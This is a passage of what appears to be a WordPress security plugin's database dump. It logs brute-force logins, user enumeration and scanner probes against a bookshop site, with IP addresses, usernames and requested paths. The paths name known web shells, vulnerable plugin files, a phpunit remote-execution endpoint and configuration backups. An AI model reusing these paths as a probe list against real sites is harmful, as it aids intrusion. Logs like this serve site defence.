1,'JHYoxMVtmbQ2sCrSWqwDUueF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.242',3423389426,'admin',0,1638041582.0453,7,'a82MP5k3OeUAWnydv6uwEtbD','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1638045976.0377,51,'TNm5FSEbDwX3J1tePAaKVQgO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.22.62.84',3189128788,'info@ashbooks.co.uk',0,1638048518.1650,51,'pDlTs5hFQGxBMSuYfCrb7tw2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.22.62.84',3189128788,'info',0,1638048524.4335,51,'SuAzqyOcWkdYDVgpGasNKtCQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.22.62.84',3189128788,'admin',0,1638048530.5026,7,'wroaWhTiqy4dP3Oj6VB5xe1N','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.161.27.142',782310286,'',0,1638050809.0110,70,'S8eaDEdkGOUvX6Y70RNZAsTg','','0|0|0|0|ashbooks.co.uk/'),('46.161.27.142',782310286,'',0,1638050809.5542,70,'MuRPEJjUA4gSOiC6pf0k2xNL','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('46.161.27.142',782310286,'admin',0,1638050830.0731,7,'hs2cqyVzB0bZ7DLPTFwCKMuX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.161.27.142',782310286,'admin',0,1638050830.5965,7,'TfHVrtFu69hWeOwKPiXUbgNn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.161.27.142',782310286,'admin',0,1638050846.1156,7,'2OCTm8Xw543NjvWK7LGuIV0h','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.161.27.142',782310286,'admin',0,1638050861.3823,7,'oT0FP5alVYeuqZEh71BRUxi4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.182.159.89',1052155737,'',0,1638053395.4808,55,'T5xObAa1iSyVIRwCErhUdQBj','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fastest-cache/images/wp-load.php'),('69.30.225.182',1159651766,'admin',0,1638057629.6440,7,'rxcpgRGmQUfMYo7shIjNtJBy','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1638070881.4984,55,'zhScI8YBMtVeQqXsTn3muFrN','','19|0|0|0|ashbooks.co.uk/moduless.php'),('204.12.198.242',3423389426,'admin',0,1638080513.7949,7,'aONYVFwEpBiJ7gefvsn9X4oU','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1638089135.6117,55,'fhJwBCbYjIamQM0gOHkE61Wo','','19|0|0|0|ashbooks.co.uk/admin/php-ofc-library/ofc_upload_image.php'),('114.119.132.10',1920435210,'',0,1638098987.3694,55,'EAQGRmc4Ow0P9lqSe6YHtTbd','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('185.220.100.253',3118228733,'admin',0,1638116513.1975,7,'F9kP7smpJHXwObS43viAYu8I','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.102.240.9',3144085513,'info@ashbooks.co.uk',0,1638123152.7988,51,'fm0CTSjZ85rFsa2MtOiR7GzU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.6',3569414406,'',0,1638126971.4682,55,'jzgso3Ic1yRUHlDbVG0fJtph','','19|0|0|0|ashbooks.co.uk/1index.php'),('212.192.241.6',3569414406,'',0,1638126994.3474,55,'nXcWojPwCHAzSv1dGm4iReDE','','19|0|0|0|ashbooks.co.uk/1index.php'),('155.94.222.11',2606685707,'',0,1638140502.7183,70,'vBY6Pq5m1LgahsJQTdie3DUy','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('147.182.198.71',2478229063,'',0,1638160040.1161,55,'XgTQSxopmq8CNnjizsKfwLO6','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('212.192.241.6',3569414406,'',0,1638163854.5453,55,'IpgRZGX6yeVO0C3fi2KUzSat','','19|0|0|0|ashbooks.co.uk/1index.php'),('212.192.241.6',3569414406,'',0,1638163890.0625,55,'yeRZsK9t5h0ELibjOSwIBp7u','','19|0|0|0|ashbooks.co.uk/1index.php'),('109.70.100.35',1833329699,'ashbooks',0,1638165375.1730,51,'il0pP4hdjrWAT5IRC6LoDSyq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.103.199.253',3110586365,'',0,1638166954.7640,55,'Ld0NSl15A3HK7V9Tfupvrask','','19|0|0|0|ashbooks.co.uk/style.php'),('147.182.198.71',2478229063,'',0,1638169121.4349,55,'rjvYTfFIqplCH2XSsuW1NQ3P','','19|0|0|0|www.ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('185.81.157.200',3109133768,'',0,1638176390.0836,55,'uKaB091SEGVxoAzpYftJl5ZO','','19|0|0|0|ashbooks.co.uk/virtual-teams-how-to-sustain-high-performing-teams-in-the-virtual-workplace/index.php'),('88.99.209.173',1482936749,'',0,1638180216.7319,70,'dKmg4X9f8xH76JDRYMPVlOZ5','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('185.191.34.215',3116311255,'',0,1638181162.5179,55,'J8kVLEjm70CAYlge4a5cfPvW','','19|0|0|0|ashbooks.co.uk/s_ne.php'),('104.244.77.53',1760841013,'ashbooks',0,1638187346.8056,51,'iIRjAXECt6yLPK1zYuaDsTkV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.111.109.226',1081044450,'',0,1638195173.8856,70,'PXKCqp2w9xjyBOW1Ng0tI3UQ','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('124.49.136.214',2083621078,'admin',0,1638195223.7215,7,'eMmEiQ6L9dG3TIJ8t75bqFgB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'info',0,1638195233.2939,51,'iQ2NcS93oFbmCeEuZfUP6AMp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'user',0,1638195237.6516,51,'riUxjh73WvfNEJY9AQswmIdV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'root',0,1638195252.4177,51,'2GPKSypf4tFgklIT6zb5nR7h','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'info@ashbooks.co.uk',0,1638195256.4768,51,'pjLwFOXm910D6uhHgVbN4PUE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'',0,1638195256.4836,10,'pjLwFOXm910D6uhHgVbN4PUE','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'',0,1638195260.2056,50,'mrzkbsycXo9HNKfTJtapF70C','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('124.49.136.214',2083621078,'',0,1638195264.0190,50,'zspkmtGJlb1HC35jfDoAPZBM','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'admin',0,1638196461.6393,7,'dNmh8q2jbiOuKCIgVlZ4f1kM','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('62.210.113.119',1053978999,'',0,1638196922.3631,55,'50F7xR3C8f92w1oSYuHclLbB','','19|0|0|0|ashbooks.co.uk/wp-admin/auto_seo.php'),('62.210.113.119',1053978999,'',0,1638196986.0879,55,'Sfai09NQZsHbtoB2Kjcdr7Oy','','19|0|0|0|ashbooks.co.uk/auto_seo.php'),('62.210.113.119',1053978999,'',0,1638197031.7799,55,'L4T813RwSWkFfpJDACZMbXIo','','19|0|0|0|ashbooks.co.uk/wp-content/auto_seo.php'),('107.150.48.237',1805005037,'admin',0,1638222021.0533,7,'8CPWJvhHoaAR6ru14wV2cl0D','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('114.119.131.92',1920435036,'',0,1638225850.5273,55,'ItBcOk3ZEwJzxboFfAmHiUjM','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('23.228.109.147',400846227,'',0,1638230054.3856,55,'v5B2UKnrQXsjbOD1kMmaAtTp','','19|0|0|0|ashbooks.co.uk/ofc2/php-ofc-library/ofc_upload_image.php'),('69.30.231.155',1159653275,'admin',0,1638231326.4451,7,'jYdowSP2EZsu7nJypD5OTkf1','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('204.12.198.242',3423389426,'admin',0,1638235938.9646,7,'NVBcExFjDtIR8anH9hpbzYl5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('107.170.252.104',1806367848,'',0,1638236041.8934,55,'bSGjy0DzPZdiRExuksX3OhCK','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php'),('107.170.252.104',1806367848,'',0,1638236045.6629,55,'qlhm3BA89gYJHbTESL7co1Df','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php'),('142.93.243.235',2388521963,'',0,1638236084.9736,55,'VXsatdML9hi0cYJujAH82KNG','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php'),('142.93.243.235',2388521963,'',0,1638236099.5290,55,'VgOu7zQZpqcwkHv9bJ4lIPDY','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php'),('5.188.62.140',96222860,'ashbooks',0,1638245074.5456,51,'ij0QDWv4bTeB8a5xVG923YP6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.9.143.94',3641282398,'admin',0,1638246929.4801,7,'WTbU9g5ptXkn7j3KYNm8yDMe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.3.203',1608057803,'admin',0,1638247847.4441,7,'mJtfh71y2B8joL6dP4GEOrsa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.31.0.242',2954821874,'admin',0,1638249869.2341,7,'Q8avwcGbD0ENJuRKi4lUZL5S','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('35.202.150.249',600479481,'admin',0,1638250992.3406,7,'Qk3PsftD4MFCr5YwK1ISdAn0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.90',1920435034,'',0,1638251133.3053,55,'GLAnh0SrEUvRFm5iaqx49Kgk','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('47.105.61.35',795426083,'admin',0,1638251979.8918,7,'H7R82ZlowjkYXa4DUiQvGcMs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.194.13',2994782733,'admin',0,1638253245.8263,7,'J5cZRpgMBveralN8wK7ij9Pu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.35',1805007139,'admin',0,1638254232.5477,7,'MGhdSHbTK01rvy3PqBUt6LnI','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('68.183.108.18',1152871442,'admin',0,1638254359.4725,7,'qQe4yPMEf6oX501HsC3TIhFx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.71',3103917127,'admin',0,1638255468.4903,7,'ZzicmXDjuxAawPs6BG5UykEo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.202',3233511114,'admin',0,1638258412.5513,7,'PMBxEk3XGnhJfL0lqoOTdYu2','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('206.189.139.182',3468528566,'admin',0,1638261547.1420,7,'R10uEL8is9lbxHSKAvhJWYMO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.77.223.41',860741417,'admin',0,1638262628.8396,7,'f2eCd0mohbG4MTRS1kHcP6vs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.75.201.58',575392058,'admin',0,1638263935.7888,7,'trsEjALb7eM3PBn6TUJxzhXg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.197.12.140',2328169612,'admin',0,1638265014.0006,7,'I6ZGvSnYebx4maPWyduHszBM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('152.228.140.7',2565114887,'admin',0,1638266171.1474,7,'yZFH1Ln7aIPcN9Ck8wDTQW2X','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.73.217.204',2991184332,'admin',0,1638267347.0072,7,'fdMJlDOsEvx2omUPZih5wenK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.77.178.214',575517398,'admin',0,1638268250.1929,7,'Qa1K2PDiUnkh0FX83ETsWtu5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1638268934.0157,7,'2N7GpezAKHtRJr6FioO589PL','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.238.75.78',3119401806,'admin',0,1638269232.0295,7,'HuTpU0mokN1c9JvaASEwYtV3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('77.240.13.186',1307577786,'admin',0,1638270247.8328,7,'KYJy3RFOxk2lCLDXvaPBpnTU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.103.199.199',3110586311,'',0,1638270430.7203,55,'KWhgTdJptOfDzyb3Cei8RQ0w','','19|0|0|0|ashbooks.co.uk/hbhbrdryld.php'),('185.103.199.116',3110586228,'',0,1638270431.0138,55,'NgM9uIcFav2CfoxtPr48jd1V','','19|0|0|0|ashbooks.co.uk/defau1t.php'),('152.228.140.7',2565114887,'admin',0,1638271283.0576,7,'IGXUOaLfAzeq8rdHVJbnWS0p','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('177.55.111.11',2973200139,'admin',0,1638272197.2957,7,'PprztAvUi9I60VkXyBZCNuSL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.40.71.188',3156756412,'admin',0,1638273216.3940,7,'N5KgdU6Sytn3TV4bqEAXDfIc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('156.38.216.210',2619791570,'admin',0,1638274559.5136,7,'1l6iJMQNR5fKxvzYHID4Lc7C','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.9.154.222',50961118,'admin',0,1638275672.2459,7,'H3dKy75GJZrVscaCmSf0tX29','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('88.150.159.29',1486266141,'admin',0,1638276924.6921,7,'sTzNJ34Bbdnq6XhagSDetO7r','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('94.23.83.103',1578586983,'admin',0,1638278160.1494,7,'BAY6p3cWT4UVh8JXKmPIDojg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('94.23.83.103',1578586983,'admin',0,1638279184.7283,7,'pkbT3WSuLEjyFZBHt7RQgcqC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.152.118.225',1738045153,'admin',0,1638281425.6752,7,'dkZX16TmGhSwnJ48HIfKvsYr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.142',757638798,'admin',0,1638282426.8110,7,'UuDWdIsR1Nwy6pLkA2Z7f8rF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.252.110.1',3338432001,'admin',0,1638283417.2323,7,'DjqnasL3Fwfi01hK7zrQb2GX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.74.197.132',1833616772,'admin',0,1638284356.4195,7,'jF6YIrthoeAMdnUyfJW1mXpS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.167',3569414567,'',0,1638284725.4122,55,'a8KYZ0IqxPf2glpUo6uOQh1B','','19|0|0|0|ashbooks.co.uk/style.php'),('212.192.241.167',3569414567,'',0,1638284762.0520,55,'maPbZ3HRDfITqeLtGXOU1xBo','','19|0|0|0|ashbooks.co.uk/moduless.php'),('212.192.241.167',3569414567,'',0,1638284831.7917,55,'jFAVhDGdvqWpn4rR7E2zL9XN','','19|0|0|0|ashbooks.co.uk/admin.php'),('212.192.241.167',3569414567,'',0,1638284896.4528,55,'7rzH9pbOuit0hwMsQ4C5dPmN','','19|0|0|0|ashbooks.co.uk/boom.php'),('212.192.241.167',3569414567,'',0,1638284908.7520,55,'zKLrDJCqjw0QBuGg3PHpF7Vd','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('212.192.241.167',3569414567,'',0,1638284908.7849,10,'zKLrDJCqjw0QBuGg3PHpF7Vd','','707|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('212.192.241.167',3569414567,'',0,1638284946.5432,100,'nQm0gFaquENbWoGxO7ctMyhY','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('212.192.241.167',3569414567,'',0,1638284986.7970,100,'aEbLMkuSZ4dcz9CQoXtOHvrD','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('212.192.241.167',3569414567,'',0,1638284998.3321,100,'vC6qoZlXW2PubTf7m8gBLShR','','13|0|0|0|ashbooks.co.uk/larva.php'),('212.192.241.167',3569414567,'',0,1638285015.7256,100,'lqkdAH5W4RIU1gXEPthz2LKD','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('212.192.241.167',3569414567,'',0,1638285033.3409,55,'JG1dTzNPFYest79nI0ZL53Mu','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('212.192.241.167',3569414567,'',0,1638285048.8310,55,'lOEy8svx59WQuNZanfjhCXb6','','19|0|0|0|ashbooks.co.uk/alfa.php'),('212.192.241.167',3569414567,'',0,1638285063.0131,55,'Xtw0amREVSZIBeW4GNvfUgMh','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('212.192.241.167',3569414567,'',0,1638285087.6753,55,'hDrtE8YOiAylLRP7HmKSJTxu','','19|0|0|0|ashbooks.co.uk/cindex.php'),('212.192.241.167',3569414567,'',0,1638285104.9613,55,'sz1jDVdXkJRmt4bc2plhouPM','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('212.192.241.167',3569414567,'',0,1638285123.5849,55,'vaNIX2eEgdS9FuMmjTCRpAo8','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('212.192.241.167',3569414567,'',0,1638285143.7389,55,'nzVM2j6gwGoXesNbRDLWPyHl','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('212.192.241.167',3569414567,'',0,1638285167.3525,55,'YxBLqP98NDanGfU4crh1bsim','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('212.192.241.167',3569414567,'',0,1638285183.8098,55,'7E8wO6FeSZRtXkNmA1QxhfYU','','19|0|0|0|ashbooks.co.uk/old-index.php'),('212.192.241.167',3569414567,'',0,1638285231.7631,55,'6NHrYqnj3iQCBALSRt048gkJ','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('212.192.241.167',3569414567,'',0,1638285259.7962,55,'hg5DHKlSkEdCxpiA76ztQj3M','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('212.192.241.167',3569414567,'',0,1638285276.4279,55,'BDlfJ2nicOUq9SZ63dxhTsIy','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('212.192.241.167',3569414567,'',0,1638285319.5013,55,'TF95Jsda3AVCBu460HoqztIE','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('212.192.241.167',3569414567,'',0,1638285335.5775,18,'gIXecdHDbUF6l3SBWRP2qh9J','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('212.192.241.167',3569414567,'',0,1638285359.0984,55,'wRsqNdghrOPey3JBY79Fu5zE','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('212.192.241.167',3569414567,'',0,1638285372.1596,100,'6TMuGBvxnha5UJH8EWVjk2pR','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('212.192.241.167',3569414567,'',0,1638285384.7252,100,'kQgsN5cZAMwpn0bLqtF1afj7','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('212.192.241.167',3569414567,'',0,1638285406.6969,55,'A3KxMjIwkrlSHQG2tYmZPOLW','','19|0|0|0|ashbooks.co.uk/haders.php'),('212.192.241.167',3569414567,'',0,1638285442.1215,100,'1k8B2J6ZbIy0gnKWPiYjducr','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('212.192.241.167',3569414567,'',0,1638285455.2653,55,'JLwT9PQUISXphs28OnDv3Gj5','','19|0|0|0|ashbooks.co.uk/legion.php'),('212.192.241.167',3569414567,'',0,1638285489.3151,55,'c1A276l0Q9KdjWoOyV5R43Ym','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('67.205.12.218',1137511642,'admin',0,1638285495.2592,7,'3zeyCNm52FZA0KujQ8rsWLoO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.167',3569414567,'',0,1638285505.0514,55,'S3fysw4tVI0nviT2Lj7qpKQ1','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('212.192.241.167',3569414567,'',0,1638285527.3733,55,'Zdn0Vh24ifugCXFJlDaYpAwj','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('212.192.241.167',3569414567,'',0,1638285560.1977,55,'TQ7NlzqUVLW0xOB1o3MRC4GH','','19|0|0|0|ashbooks.co.uk/up.php'),('212.192.241.167',3569414567,'',0,1638285577.4504,55,'txvG4oC9nQcKSOm5p8VeaY2z','','19|0|0|0|ashbooks.co.uk/upload.php'),('212.192.241.167',3569414567,'',0,1638285603.5224,55,'dDNesRmJBKzS3wU7lEV6btr2','','19|0|0|0|ashbooks.co.uk/config.php'),('212.192.241.167',3569414567,'',0,1638285652.2460,55,'VZYsrvKxzGQ0ORngDS3klbEw','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('212.192.241.167',3569414567,'',0,1638285665.4277,55,'pS75IiXuenFgYAal8WtPodGy','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('212.192.241.167',3569414567,'',0,1638285712.0817,55,'rywzAQl2V890CdkIgBtjuWme','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('152.228.140.7',2565114887,'admin',0,1638286443.7492,7,'Fvwnac710oITr2L5EDbOWHXZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.5.109',2994734445,'admin',0,1638287590.9427,7,'TngIPuyE7lei0ZFNXCdz3VAk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('2.56.59.242',37239794,'',0,1638287621.9873,70,'GHxzA645jNdLitZUnXbphvkE','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('34.75.201.58',575392058,'admin',0,1638289032.7490,7,'vs2PaNA8yehDTXw4mjxMiHGE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.94.99',2703449699,'admin',0,1638290328.5550,7,'P3wNGzCAFZh2KiM85ElSLnrY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.223.55.111',1390360431,'admin',0,1638292764.2335,7,'gADyeS0C5LBlcaNr7vVGTxzi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.242',3423389426,'admin',0,1638293445.8022,7,'2BFcfHaipPjlT8WehCmqxJ4w','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('35.203.61.118',600522102,'admin',0,1638293812.3008,7,'fRI3TKMUX0PcwuDb6A5LhWmZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.220.215',2160581847,'admin',0,1638295135.8385,7,'PQcY8bR2WNghfOC3JlUp4679','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1638296577.3265,51,'nU7RNHZydGFgi8kJAbOXPzLq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.168.174.187',1755885243,'',0,1638302238.5887,70,'3S47AkaFDXYhe9nvw5K0rmWz','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.168.174.187',1755885243,'',0,1638302255.9906,70,'b5Xo13th0Fq7KwIncPAvRuHU','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('204.12.198.242',3423389426,'admin',0,1638303391.4918,7,'Rr5Uc3fqhwCmkYDeAyKSXNox','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1638319833.3527,55,'0eRF954KkUoDMHCinZgm1rY3','','19|0|0|0|ashbooks.co.uk/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php'),('204.12.198.242',3423389426,'admin',0,1638323029.8541,7,'iSlnwJGq5fWuAer8Z34hDNdM','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.225.178',1159651762,'admin',0,1638328015.5110,7,'onSI057q2WM94vNf1y6HQVgP','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('114.119.131.97',1920435041,'',0,1638329481.7726,55,'Pz82TDwl15vn3fB6XVbj9KUO','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('157.245.156.140',2650119308,'',0,1638331705.6473,70,'hUy0tsuSHmewxQY6fnvO1jbp','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('114.119.132.103',1920435303,'',0,1638337174.2734,55,'sMKTBVDLfG7oWQg2Rd5ZqO0v','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('185.191.34.215',3116311255,'',0,1638337244.6375,55,'wrs1yVLMYdXEgKoeOtiBb4Rh','','19|0|0|0|ashbooks.co.uk/assets/images/wp_wrong_datlib.php'),('212.192.241.6',3569414406,'',0,1638345110.0698,55,'PjgmiIZldpt7296QvRDey08u','','19|0|0|0|ashbooks.co.uk/1index.php'),('212.192.241.6',3569414406,'',0,1638345177.4669,55,'6KjTJfsSG097vX24DubFowVg','','19|0|0|0|ashbooks.co.uk/1index.php'),('51.15.20.50',856626226,'',0,1638345438.6917,55,'1oI9yWEYKSCQjtLRkBcNwAFe','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('51.15.20.50',856626226,'',0,1638347278.5656,70,'1zQXK4FkiC9g7VmPUhl6TWrE','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('34.122.91.192',578444224,'',0,1638348329.5250,55,'NsbMWK7mXI4Yar60F2pgiSnh','','19|0|0|0|ashbooks.co.uk/x.php'),('34.122.91.192',578444224,'',0,1638348343.0013,55,'b6ktPHO2VJ7pCeqAx5m4nNf8','','19|0|0|0|ashbooks.co.uk/wso.php'),('34.122.91.192',578444224,'',0,1638348347.8549,55,'Hvz2i4O3s6Enq05GtULxIybR','','19|0|0|0|ashbooks.co.uk/srx.php'),('34.122.91.192',578444224,'',0,1638348349.0384,55,'qLg0s1BZNUtWMX7nOHG5SauF','','19|0|0|0|ashbooks.co.uk/1337.php'),('34.122.91.192',578444224,'',0,1638348350.2187,55,'iUK7M1hbcpzAn6r2mwROFJj0','','19|0|0|0|ashbooks.co.uk/xx.php'),('34.122.91.192',578444224,'',0,1638348350.2445,10,'iUK7M1hbcpzAn6r2mwROFJj0','','707|0|0|0|ashbooks.co.uk/xx.php'),('34.122.91.192',578444224,'',0,1638348351.0630,55,'jatM0if6BKsleY49Hb2uWFGd','','19|0|0|0|ashbooks.co.uk/XxX.php'),('34.122.91.192',578444224,'',0,1638348353.0330,55,'pZBQPbXam9Sfx5O3rqdjntse','','19|0|0|0|ashbooks.co.uk/leaf.php'),('34.122.91.192',578444224,'',0,1638348354.2782,55,'2wI0X6KCZqRAO9QzGYuLrNM4','','19|0|0|0|ashbooks.co.uk/leafmailer2.8.php'),('34.122.91.192',578444224,'',0,1638348356.2982,55,'pCd5xgYNBt84FmEJQkHZwXvL','','19|0|0|0|ashbooks.co.uk/bb.php'),('34.122.91.192',578444224,'',0,1638348357.5226,55,'Ugm2dcSpTDNnh4vksjtH1w5R','','19|0|0|0|ashbooks.co.uk/m.php'),('34.122.91.192',578444224,'',0,1638348359.5350,55,'cBxdWK2ulQYorVq9R1aUi7n4','','19|0|0|0|ashbooks.co.uk/mar.php'),('34.122.91.192',578444224,'',0,1638348362.5397,55,'NtPmFczpWZMTwXQxLUKJobR6','','19|0|0|0|ashbooks.co.uk/alfa.php'),('34.122.91.192',578444224,'',0,1638348363.5236,55,'gtQZoO9FnzNeMjW057BT4r16','','19|0|0|0|ashbooks.co.uk/a.php'),('34.122.91.192',578444224,'',0,1638348365.9925,55,'BVjrYcZtxmh2K4GEfMQL39Pe','','19|0|0|0|ashbooks.co.uk/c.php'),('34.122.91.192',578444224,'',0,1638348368.1163,55,'xBY76heqWQMgHIryCXAtREKz','','19|0|0|0|ashbooks.co.uk/b.php'),('34.122.91.192',578444224,'',0,1638348369.7429,55,'Jr3kXg9EBsfTOHlbF2tYjeDq','','19|0|0|0|ashbooks.co.uk/f.php'),('34.122.91.192',578444224,'',0,1638348373.5446,55,'CP8YVLKIv9qRStb4o56Ayn2X','','19|0|0|0|ashbooks.co.uk/1.php'),('34.122.91.192',578444224,'',0,1638348374.7827,55,'AgH9K5Edro1aSUlh4JRpWXNm','','19|0|0|0|ashbooks.co.uk/2.php'),('34.122.91.192',578444224,'',0,1638348377.2451,55,'f5KcP4wOxhvWDdJ3SjVGM26q','','19|0|0|0|ashbooks.co.uk/old-index.php'),('34.122.91.192',578444224,'',0,1638348378.9886,55,'mIBNlvo1d356qpOJjRnaiEZQ','','19|0|0|0|ashbooks.co.uk/new-index.php'),('34.122.91.192',578444224,'',0,1638348381.8157,55,'gpU2uVoXI4q09xD136zPAS7Z','','19|0|0|0|ashbooks.co.uk/1index.php'),('34.122.91.192',578444224,'',0,1638348385.2098,55,'N32xX90sOWVmYwFH1z7CSLPU','','19|0|0|0|ashbooks.co.uk/wikindex.php'),('34.122.91.192',578444224,'',0